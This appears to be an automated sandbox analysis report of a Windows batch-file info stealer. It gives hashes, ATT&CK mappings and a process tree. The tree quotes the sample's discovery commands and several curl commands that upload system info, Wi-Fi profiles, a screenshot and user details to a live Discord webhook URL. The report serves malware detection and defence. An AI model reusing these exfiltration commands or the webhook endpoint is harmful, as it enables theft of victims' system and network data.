4c093503fc15521d72858350aa6da1bc271bb425d1640bf925c9caa641c695cf

Analysis

max time kernel
93s
max time network
95s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
05/08/2024, 08:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fixed_token_grabber (1).bat
Size

19KB
MD5

49fae7a1882ffc5f399d87b67137a731
SHA1

7ba5ed655c599de4f05d9dc5c5ad367caa6f4ab3
SHA256

4c093503fc15521d72858350aa6da1bc271bb425d1640bf925c9caa641c695cf
SHA512

e3ced780a79d5c37b884be93cd5c8f782b19965352e6e4be28ac2441c2204df84cb6a7c948a0468727feff9a4069e97fdedc084105813a94078b7d6205582ff1
SSDEEP

384:DtbMSdVAg9120aNEkfYYGxQYUfPt7GusKrTt2OoXatpD:lCDfNEvYGxQYUfPt7GusKrTtHoXatpD

Score

10^/10

discovery execution persistence privilege_escalation

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://discord.com/api/webhooks/1268965961969569992/5ZC3-hsLN4Ifht2uBYskLfX_tA_cn5Z-ngqCJRCykzz8S6Qbc-YU8f9E0EqJzqB8JpUE

Extracted

Language

ps1

Source

URLs

exe.dropper

https://discord.com/api/webhooks/1268965961969569992/5ZC3-hsLN4Ifht2uBYskLfX_tA_cn5Z-ngqCJRCykzz8S6Qbc-YU8f9E0EqJzqB8JpUE

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
66	2532	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 11 IoCs

Web Service

T1102

flow	ioc
30	discord.com
66	discord.com
44	discord.com
47	discord.com
50	discord.com
24	discord.com
25	discord.com
35	discord.com
38	discord.com
41	discord.com
59	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	myexternalip.com
2	myexternalip.com

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4300	powershell.exe
3364	powershell.exe
2532	powershell.exe

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
2652	cmd.exe
1156	netsh.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
4280	timeout.exe

Gathers network information 2 TTPs 2 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
3968	ipconfig.exe
4548	NETSTAT.EXE

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
2984	systeminfo.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
4300	powershell.exe
4300	powershell.exe
3364	powershell.exe
3364	powershell.exe
2532	powershell.exe
2532	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4300	powershell.exe
Token: SeIncreaseQuotaPrivilege	4752	WMIC.exe
Token: SeSecurityPrivilege	4752	WMIC.exe
Token: SeTakeOwnershipPrivilege	4752	WMIC.exe
Token: SeLoadDriverPrivilege	4752	WMIC.exe
Token: SeSystemProfilePrivilege	4752	WMIC.exe
Token: SeSystemtimePrivilege	4752	WMIC.exe
Token: SeProfSingleProcessPrivilege	4752	WMIC.exe
Token: SeIncBasePriorityPrivilege	4752	WMIC.exe
Token: SeCreatePagefilePrivilege	4752	WMIC.exe
Token: SeBackupPrivilege	4752	WMIC.exe
Token: SeRestorePrivilege	4752	WMIC.exe
Token: SeShutdownPrivilege	4752	WMIC.exe
Token: SeDebugPrivilege	4752	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4752	WMIC.exe
Token: SeRemoteShutdownPrivilege	4752	WMIC.exe
Token: SeUndockPrivilege	4752	WMIC.exe
Token: SeManageVolumePrivilege	4752	WMIC.exe
Token: 33	4752	WMIC.exe
Token: 34	4752	WMIC.exe
Token: 35	4752	WMIC.exe
Token: 36	4752	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4752	WMIC.exe
Token: SeSecurityPrivilege	4752	WMIC.exe
Token: SeTakeOwnershipPrivilege	4752	WMIC.exe
Token: SeLoadDriverPrivilege	4752	WMIC.exe
Token: SeSystemProfilePrivilege	4752	WMIC.exe
Token: SeSystemtimePrivilege	4752	WMIC.exe
Token: SeProfSingleProcessPrivilege	4752	WMIC.exe
Token: SeIncBasePriorityPrivilege	4752	WMIC.exe
Token: SeCreatePagefilePrivilege	4752	WMIC.exe
Token: SeBackupPrivilege	4752	WMIC.exe
Token: SeRestorePrivilege	4752	WMIC.exe
Token: SeShutdownPrivilege	4752	WMIC.exe
Token: SeDebugPrivilege	4752	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4752	WMIC.exe
Token: SeRemoteShutdownPrivilege	4752	WMIC.exe
Token: SeUndockPrivilege	4752	WMIC.exe
Token: SeManageVolumePrivilege	4752	WMIC.exe
Token: 33	4752	WMIC.exe
Token: 34	4752	WMIC.exe
Token: 35	4752	WMIC.exe
Token: 36	4752	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2440	WMIC.exe
Token: SeSecurityPrivilege	2440	WMIC.exe
Token: SeTakeOwnershipPrivilege	2440	WMIC.exe
Token: SeLoadDriverPrivilege	2440	WMIC.exe
Token: SeSystemProfilePrivilege	2440	WMIC.exe
Token: SeSystemtimePrivilege	2440	WMIC.exe
Token: SeProfSingleProcessPrivilege	2440	WMIC.exe
Token: SeIncBasePriorityPrivilege	2440	WMIC.exe
Token: SeCreatePagefilePrivilege	2440	WMIC.exe
Token: SeBackupPrivilege	2440	WMIC.exe
Token: SeRestorePrivilege	2440	WMIC.exe
Token: SeShutdownPrivilege	2440	WMIC.exe
Token: SeDebugPrivilege	2440	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2440	WMIC.exe
Token: SeRemoteShutdownPrivilege	2440	WMIC.exe
Token: SeUndockPrivilege	2440	WMIC.exe
Token: SeManageVolumePrivilege	2440	WMIC.exe
Token: 33	2440	WMIC.exe
Token: 34	2440	WMIC.exe
Token: 35	2440	WMIC.exe
Token: 36	2440	WMIC.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
3364	powershell.exe
3364	powershell.exe

Suspicious use of WriteProcessMemory 50 IoCs

description	pid	Process	procid_target
PID 4192 wrote to memory of 4568	4192	cmd.exe	84
PID 4192 wrote to memory of 4568	4192	cmd.exe	84
PID 4568 wrote to memory of 2980	4568	net.exe	85
PID 4568 wrote to memory of 2980	4568	net.exe	85
PID 4192 wrote to memory of 4184	4192	cmd.exe	86
PID 4192 wrote to memory of 4184	4192	cmd.exe	86
PID 4192 wrote to memory of 4300	4192	cmd.exe	90
PID 4192 wrote to memory of 4300	4192	cmd.exe	90
PID 4192 wrote to memory of 4752	4192	cmd.exe	91
PID 4192 wrote to memory of 4752	4192	cmd.exe	91
PID 4192 wrote to memory of 2440	4192	cmd.exe	93
PID 4192 wrote to memory of 2440	4192	cmd.exe	93
PID 4192 wrote to memory of 4888	4192	cmd.exe	94
PID 4192 wrote to memory of 4888	4192	cmd.exe	94
PID 4192 wrote to memory of 2984	4192	cmd.exe	95
PID 4192 wrote to memory of 2984	4192	cmd.exe	95
PID 4192 wrote to memory of 908	4192	cmd.exe	97
PID 4192 wrote to memory of 908	4192	cmd.exe	97
PID 4192 wrote to memory of 2652	4192	cmd.exe	98
PID 4192 wrote to memory of 2652	4192	cmd.exe	98
PID 2652 wrote to memory of 1156	2652	cmd.exe	99
PID 2652 wrote to memory of 1156	2652	cmd.exe	99
PID 4192 wrote to memory of 3968	4192	cmd.exe	100
PID 4192 wrote to memory of 3968	4192	cmd.exe	100
PID 4192 wrote to memory of 4548	4192	cmd.exe	101
PID 4192 wrote to memory of 4548	4192	cmd.exe	101
PID 4192 wrote to memory of 4280	4192	cmd.exe	102
PID 4192 wrote to memory of 4280	4192	cmd.exe	102
PID 4192 wrote to memory of 3364	4192	cmd.exe	103
PID 4192 wrote to memory of 3364	4192	cmd.exe	103
PID 3364 wrote to memory of 1928	3364	powershell.exe	104
PID 3364 wrote to memory of 1928	3364	powershell.exe	104
PID 4192 wrote to memory of 2764	4192	cmd.exe	105
PID 4192 wrote to memory of 2764	4192	cmd.exe	105
PID 4192 wrote to memory of 1080	4192	cmd.exe	106
PID 4192 wrote to memory of 1080	4192	cmd.exe	106
PID 4192 wrote to memory of 3628	4192	cmd.exe	107
PID 4192 wrote to memory of 3628	4192	cmd.exe	107
PID 4192 wrote to memory of 2816	4192	cmd.exe	108
PID 4192 wrote to memory of 2816	4192	cmd.exe	108
PID 4192 wrote to memory of 4308	4192	cmd.exe	109
PID 4192 wrote to memory of 4308	4192	cmd.exe	109
PID 4192 wrote to memory of 2072	4192	cmd.exe	110
PID 4192 wrote to memory of 2072	4192	cmd.exe	110
PID 4192 wrote to memory of 1132	4192	cmd.exe	111
PID 4192 wrote to memory of 1132	4192	cmd.exe	111
PID 4192 wrote to memory of 2848	4192	cmd.exe	112
PID 4192 wrote to memory of 2848	4192	cmd.exe	112
PID 4192 wrote to memory of 2532	4192	cmd.exe	115
PID 4192 wrote to memory of 2532	4192	cmd.exe	115

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\fixed_token_grabber (1).bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4192
- C:\Windows\system32\net.exe
  net session
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4568
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 session
    3⤵
    PID:2980
- C:\Windows\system32\curl.exe
  curl -o C:\Users\Admin\AppData\Local\Temp\ipp.txt https://myexternalip.com/raw
  2⤵
  PID:4184
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table >C:\Users\Admin\AppData\Local\Temp\programms.txt "
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4300
- C:\Windows\System32\Wbem\WMIC.exe
  wmic diskdrive get size
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4752
- C:\Windows\System32\Wbem\WMIC.exe
  wmic bios get serialnumber
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2440
- C:\Windows\System32\Wbem\WMIC.exe
  wmic cpu get name
  2⤵
  PID:4888
- C:\Windows\system32\systeminfo.exe
  systeminfo
  2⤵
  - Gathers system information
  PID:2984
- C:\Windows\System32\Wbem\WMIC.exe
  wmic csproduct get uuid
  2⤵
  PID:908
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh wlan show profile
  2⤵
  - System Network Configuration Discovery: Wi-Fi Discovery
  - Suspicious use of WriteProcessMemory
  PID:2652
- - C:\Windows\system32\netsh.exe
    netsh wlan show profile
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:1156
- C:\Windows\system32\ipconfig.exe
  ipconfig /all
  2⤵
  - Gathers network information
  PID:3968
- C:\Windows\system32\NETSTAT.EXE
  netstat -an
  2⤵
  - Gathers network information
  PID:4548
- C:\Windows\system32\timeout.exe
  timeout 1
  2⤵
  - Delays execution with timeout.exe
  PID:4280
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell.exe -executionpolicy remotesigned -File C:\Users\Admin\AppData\Local\Temp\test.ps1
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:3364
- - C:\Windows\system32\curl.exe
    "C:\Windows\system32\curl.exe" -i -F file=@C:\Users\Admin\AppData\Local\Temp\Admin_Capture.jpg https://discord.com/api/webhooks/1268965961969569992/5ZC3-hsLN4Ifht2uBYskLfX_tA_cn5Z-ngqCJRCykzz8S6Qbc-YU8f9E0EqJzqB8JpUE
    3⤵
    PID:1928
- C:\Windows\system32\curl.exe
  curl -X POST -H "Content-type: application/json" --data "{\"content\": \"```User = Admin Ip = 194.110.13.70 time = 8:59:27.43 date = Mon 08/05/2024 os = Windows_NT Computername = ZEUYFSYD ```\"}" https://discord.com/api/webhooks/1268965961969569992/5ZC3-hsLN4Ifht2uBYskLfX_tA_cn5Z-ngqCJRCykzz8S6Qbc-YU8f9E0EqJzqB8JpUE
  2⤵
  PID:2764
- C:\Windows\system32\curl.exe
  curl -i -H 'Expect: application/json' -F file=@C:\Users\Admin\AppData\Local\Temp\System_INFO.txt https://discord.com/api/webhooks/1268965961969569992/5ZC3-hsLN4Ifht2uBYskLfX_tA_cn5Z-ngqCJRCykzz8S6Qbc-YU8f9E0EqJzqB8JpUE
  2⤵
  PID:1080
- C:\Windows\system32\curl.exe
  curl -i -H 'Expect: application/json' -F file=@C:\Users\Admin\AppData\Local\Temp\sysi.txt https://discord.com/api/webhooks/1268965961969569992/5ZC3-hsLN4Ifht2uBYskLfX_tA_cn5Z-ngqCJRCykzz8S6Qbc-YU8f9E0EqJzqB8JpUE
  2⤵
  PID:3628
- C:\Windows\system32\curl.exe
  curl -i -H 'Expect: application/json' -F file=@C:\Users\Admin\AppData\Local\Temp\ip.txt https://discord.com/api/webhooks/1268965961969569992/5ZC3-hsLN4Ifht2uBYskLfX_tA_cn5Z-ngqCJRCykzz8S6Qbc-YU8f9E0EqJzqB8JpUE
  2⤵
  PID:2816
- C:\Windows\system32\curl.exe
  curl -i -H 'Expect: application/json' -F file=@C:\Users\Admin\AppData\Local\Temp\netstat.txt https://discord.com/api/webhooks/1268965961969569992/5ZC3-hsLN4Ifht2uBYskLfX_tA_cn5Z-ngqCJRCykzz8S6Qbc-YU8f9E0EqJzqB8JpUE
  2⤵
  PID:4308
- C:\Windows\system32\curl.exe
  curl -i -H 'Expect: application/json' -F file=@C:\Users\Admin\AppData\Local\Temp\programms.txt https://discord.com/api/webhooks/1268965961969569992/5ZC3-hsLN4Ifht2uBYskLfX_tA_cn5Z-ngqCJRCykzz8S6Qbc-YU8f9E0EqJzqB8JpUE
  2⤵
  PID:2072
- C:\Windows\system32\curl.exe
  curl -i -H 'Expect: application/json' -F file=@C:\Users\Admin\AppData\Local\Temp\uuid.txt https://discord.com/api/webhooks/1268965961969569992/5ZC3-hsLN4Ifht2uBYskLfX_tA_cn5Z-ngqCJRCykzz8S6Qbc-YU8f9E0EqJzqB8JpUE
  2⤵
  PID:1132
- C:\Windows\system32\curl.exe
  curl -i -H 'Expect: application/json' -F file=@C:\Users\Admin\AppData\Local\Temp\wlan.txt https://discord.com/api/webhooks/1268965961969569992/5ZC3-hsLN4Ifht2uBYskLfX_tA_cn5Z-ngqCJRCykzz8S6Qbc-YU8f9E0EqJzqB8JpUE
  2⤵
  PID:2848
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell.exe -executionpolicy remotesigned -File C:\Users\Admin\AppData\Local\Temp\testtttt.ps1
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:2532

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
223bd4ae02766ddc32e6145fd1a29301

SHA1
900cfd6526d7e33fb4039a1cc2790ea049bc2c5b

SHA256
1022ec2fed08ff473817fc53893e192a8e33e6a16f3d2c8cb6fd37f49c938e1e

SHA512
648cd3f8a89a18128d2b1bf960835e087a74cdbc783dbfcc712b3cb9e3a2e4f715e534ba2ef81d89af8f60d4882f6859373248c875ceb26ad0922e891f2e74cc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4a4f876c5eaaa6c94a78a061f85c95f8

SHA1
7b1093ec18470bde7277ddd886c97755ca97ed78

SHA256
733339ce7f8481169b45a334a641f55e5890dd7f01425b0024a6f8c09d10efe4

SHA512
2e0e502a28a6a492b05e4452455e147004b80694358691749a229ed4389f95eda06318cdb3afc476d5f8bcf196da07b9224271f98e002255c3486eb2f3e378f8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
9b53429e28f910e125239e95e23ef267

SHA1
8963b2eb63e21642545b2a023e7fb41332a23e13

SHA256
20f516fc915cd85d967a78663cdc344b70d99fcb79fc0f96bb199def8c7b4cd2

SHA512
db592560dc8c20866634be7cc0a576873e5e0efab6d8ba700eb5a822aa8fc409a337a474320df161bb45503608a6065664a15d685dc04994960706d5bc986055

Download Submit
C:\Users\Admin\AppData\Local\Temp\Admin_Capture.jpg

Filesize
67KB

MD5
c0f4a595d5b5386c5dc7f558daf9d690

SHA1
97a2bcc640aa8c65766e3b18b15215b46c075226

SHA256
d467a6d208751902496004cb8ab007c6e3d8048abffee2fbe55137f88bf72595

SHA512
c2f82ad62ece20c3cca1ba56538936ce0d684cd7093c294be88a9fc718a4b63cb14582c66129861dce5fb8759d55b6a798c242dc45a52099712bd9d3d3f5e8a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\System_INFO.txt

Filesize
311B

MD5
533c630c2f09949235ff3d463041deff

SHA1
be73ac6c09729d9063001f2c05c61b8b816ff303

SHA256
734eb105772c9c6878017c9ab34fa0f4bb73e0142aab068b71161d28776c835c

SHA512
e0581b8b11175f5bc1aeada6be7772f7c889bf64ad40b7c87ad4feea536a96b875dd8d97f7ed5e791671f0453e70954eacdebb58cf667d5c9fdb33eff1221ca8

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_d0wppprg.n5w.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ip.txt

Filesize
1023B

MD5
7176532a549cf11e1465e22f623f8d61

SHA1
c54edc9720d97b2179dd9c749a68af2e368af463

SHA256
7543054ef6936b564c2bd3a0cd2fcee0f8796478e023ea92aa2543b6901af661

SHA512
868e0bdd26b9aa75335ade0930f1598b976acc0d37afafa8fc7fb6c903d020cf3f2b8bb5243289e0ddaf2b03e4320ba02a991e76548667587a5ea493d005f375

Download Submit
C:\Users\Admin\AppData\Local\Temp\ipp.txt

Filesize
13B

MD5
907326301a53876360553d631f2775c4

SHA1
e900c12c18a7295611f3e2234bc68e8dc0501e06

SHA256
d5543b3a5715587c9c0993a7f56f3e1ee445af837f62c38f2f3457a2ea8d00c8

SHA512
435c1fd96b79b70c370d6f769d44eca3e682404189ff42a6b5718c21bf9dc8358d72c115d68dc25014b8cb9c709af0e64de012103fce687cf4a340fa8f3ea2aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\netstat.txt

Filesize
3KB

MD5
0703c977f8bcc854558fea1e79b7e07e

SHA1
47063357f020f7db3f0b7a41b513f3fdfa1f10f5

SHA256
49d366a70dfa6f3a071844bede021ef965956be7ecf87615b4b27bb727c3ab3a

SHA512
3bebb708f5b4c95a996d5171a91d11cf47c603ed61c87a1554f96b1cc481bce64ee4a28b0788afc21331a4fe2e1c64b59dd9e9cb0e0603996b0b87eef94c223d

Download Submit
C:\Users\Admin\AppData\Local\Temp\programms.txt

Filesize
9KB

MD5
acca32a6140cea470836cf6548eb7a34

SHA1
89da0e30eeb005c1f540aebd97f7a465e2c27967

SHA256
07bfb9ce85f34f19cb208379423d51f76a73d2b082e1f615ff9ecd00821db38f

SHA512
f0bf69b5e71ebe90c6a70f37aadb914e9d49707a5aac9e7bcc5aa5154f8faecb81cfd329fe73e4345b19bc2f3b26ae7fd49dc6b61c99eb0f5606f4f5538b23bf

Download Submit
C:\Users\Admin\AppData\Local\Temp\sysi.txt

Filesize
2KB

MD5
e7e4a8c8f60fd82e96f9446750da698b

SHA1
48600a162a33a54db1a2d066947fd357d342e63b

SHA256
32791646ba4de6b6b8bec339187cd18b61ff0e7f9a35358147cc6f7ccd841298

SHA512
afd139c3e0ab2db42e1bd332f65956169cf803e8e534ea269529f52f8a156d5545ccf730c00c13a790c5de2757d9c2a55b440ae6ab00948c77908d3e2046c3fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\test.ps1

Filesize
1KB

MD5
84e5cde8d6f8da30da6f23b4f86341d7

SHA1
b8ee28471e77b36dc61ea2dc649ac1352738740f

SHA256
c29e4d6c389bafada7d258c70be0bd89a3fe94a4210f50d0f2f77d9d38c113bc

SHA512
261d164d8ddf3fe2256ad11ff83c0dbf4ecf231872a93b7daa5f2b7f2feb578bb1faffcac9fe553372aff0f6e0b85b260c0ca634586c2be53d73098014c194f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\testtttt.ps1

Filesize
2KB

MD5
cf0d2c2095fd8dfa4580ca51d954ea4c

SHA1
f58b98b09b530e870a669597ac5d42bbe414b753

SHA256
eaf3e00e8b3c23a16122893110bb3af795fa89d0f3911604aa48b785c5ba6810

SHA512
6255f9f9089c014db3707e40320876b3a012608eb6f6d55a5e72ad7cd4f89104309d3e2644d8fd631f8a6313d2ffda8251b6845ba84301d178d5328fcc771eda

Download Submit
C:\Users\Admin\AppData\Local\Temp\uuid.txt

Filesize
6B

MD5
bea07e6d2b8dce396fe21baa61b34956

SHA1
665332b36fc8fa1ed11210cdee83b639b451e592

SHA256
2e08d1f6000aef541797d008c05ac36f4dbebfb36cbac5615788e6fcc5b300a7

SHA512
4ad82fbef6d8d3f4d0b90a9399c8b405674bad0c750e385fb034e57895838fd26d7926f6ed0ccab2e2afcaf4a23613ed8f16d909bff870b40187e22e0a6362c1

Download Submit
memory/2532-143-0x000001A3C14B0000-0x000001A3C1672000-memory.dmp

Filesize
1.8MB

Download
memory/2532-144-0x000001A3C1BB0000-0x000001A3C20D8000-memory.dmp

Filesize
5.2MB

Download
memory/2532-145-0x000001A3C2890000-0x000001A3C3036000-memory.dmp

Filesize
7.6MB

Download
memory/4300-18-0x00007FF99DDA0000-0x00007FF99E861000-memory.dmp

Filesize
10.8MB

Download
memory/4300-14-0x00007FF99DDA0000-0x00007FF99E861000-memory.dmp

Filesize
10.8MB

Download
memory/4300-13-0x00007FF99DDA0000-0x00007FF99E861000-memory.dmp

Filesize
10.8MB

Download
memory/4300-3-0x000002005D7C0000-0x000002005D7E2000-memory.dmp

Filesize
136KB

Download
memory/4300-2-0x00007FF99DDA3000-0x00007FF99DDA5000-memory.dmp

Filesize
8KB

Download